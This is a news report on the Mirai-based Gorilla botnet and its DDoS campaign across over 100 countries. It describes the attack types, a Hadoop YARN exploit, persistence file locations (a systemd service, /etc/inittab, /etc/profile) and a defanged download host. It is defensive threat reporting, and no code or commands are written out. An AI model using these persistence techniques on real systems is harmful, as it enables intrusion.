Gorilla Botnet Unleashes 300,000+ DDoS Attacks in Over 100 Countries
Cybersecurity experts have uncovered a new botnet malware family dubbed Gorilla (also known as GorillaBot), which is based on the leaked source code of the infamous Mirai botnet. According to cybersecurity firm NSFOCUS, the Gorilla botnet initiated a staggering 300,000+ attack commands between September 4 and September 27, 2024, showcasing an unprecedented level of attack density.
On average, the botnet has been generating over 20,000 distributed denial-of-service (DDoS) attack commands per day, targeting a wide array of sectors including universities, government websites, telecom companies, banks, gaming, and gambling platforms. The most affected countries include China, the United States, Canada, and Germany, but the attacks have spanned across more than 100 nations.
The botnet uses a range of powerful DDoS techniques, such as UDP flood, SYN flood, ACK flood, ACK BYPASS flood, and Valve Source Engine (VSE) flood. The use of the UDP protocol, which allows for arbitrary IP address spoofing, helps the botnet generate overwhelming traffic.
Gorilla’s versatility extends to its support for multiple CPU architectures, including ARM, MIPS, x86_64, and x86, enabling it to infect a variety of devices. It connects to one of five predefined command-and-control (C2) servers, which issue DDoS commands.
In a significant twist, the malware also exploits a known Apache Hadoop YARN RPC vulnerability to achieve remote code execution. This vulnerability, abused since 2021 according to Alibaba Cloud and Trend Micro, further underscores Gorilla’s evolving threat potential.
The botnet also employs persistence mechanisms to maintain control over infected hosts. It creates a service file named "custom.service" in the "/etc/systemd/system/" directory, ensuring automatic execution at system startup. Additionally, commands are embedded into files such as "/etc/inittab," "/etc/profile," and "/boot/bootcmd" to download and execute a malicious script ("lol.sh") from a remote server ("pen.gorillafirewall[.]su").
What sets Gorilla apart is its use of encryption algorithms, commonly seen in attacks by the Keksec group, to obscure critical information and evade detection. According to NSFOCUS, this emerging botnet demonstrates an advanced level of counter-detection techniques and is adept at maintaining long-term control over IoT devices and cloud servers.
Key takeaways:
- Over 300,000 DDoS attacks launched across 100+ countries.
- Targets range from universities to government and financial institutions.
- Exploits a vulnerability in Apache Hadoop YARN RPC for remote code execution.
- Uses multiple DDoS attack methods and sophisticated encryption to evade detection.
This makes GorillaBot a rising cybersecurity threat that organizations worldwide must guard against
